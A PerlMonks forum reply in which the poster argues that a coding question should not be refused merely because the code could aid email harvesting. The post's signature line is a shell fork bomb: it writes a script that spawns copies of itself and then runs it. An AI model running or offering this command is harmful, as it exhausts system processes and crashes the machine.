Update: As someone in the CB mentioned, what if the original poster had not mentioned this was being used to extract email? His problem is essentially a database problem, not an email extraction problem.

Quick, delete all nodes on matching an email address! They might be used for spamming! Oh crap, delete all the nodes on regular expressions, they're used for finding email addresses! You see where this goes?

End Update

Your logic is similar to:

"Most guns are used to do evil in this world. Therefore, I can not help you learn about guns."

or pehaps this is closer to home:

"Most email viruses are written in Visual Basic*. Therefore I can not help you learn about Visual Basic."

* I have no idea if this is true. Used for example only.

Unless I am gravely mistaken, this is a site for sharing a love of coding, perl in particular, and helping others. Not personal ethics.

ibanix

$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;

In reply to Re: Re: Adding data to an access database by ibanix
in thread Adding data to an access database by Raziel

Title:
Use:  <p> text here (a paragraph) </p>
and:  <code> code here </code>
to format your post, it's "PerlMonks-approved HTML":



  • Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
  • Titles consisting of a single word are discouraged, and in most cases are disallowed outright.
  • Read Where should I post X? if you're not absolutely sure you're posting in the right place.
  • Please read these before you post! —
  • Posts may use any of the Perl Monks Approved HTML tags:
    a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, details, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
  • You may need to use entities for some characters, as follows. (Exception: Within code tags, you can put the characters literally.)
            For:     Use:
    & &amp;
    < &lt;
    > &gt;
    [ &#91;
    ] &#93;
  • Link using PerlMonks shortcuts! What shortcuts can I use for linking?
  • See Writeup Formatting Tips and other pages linked from there for more info.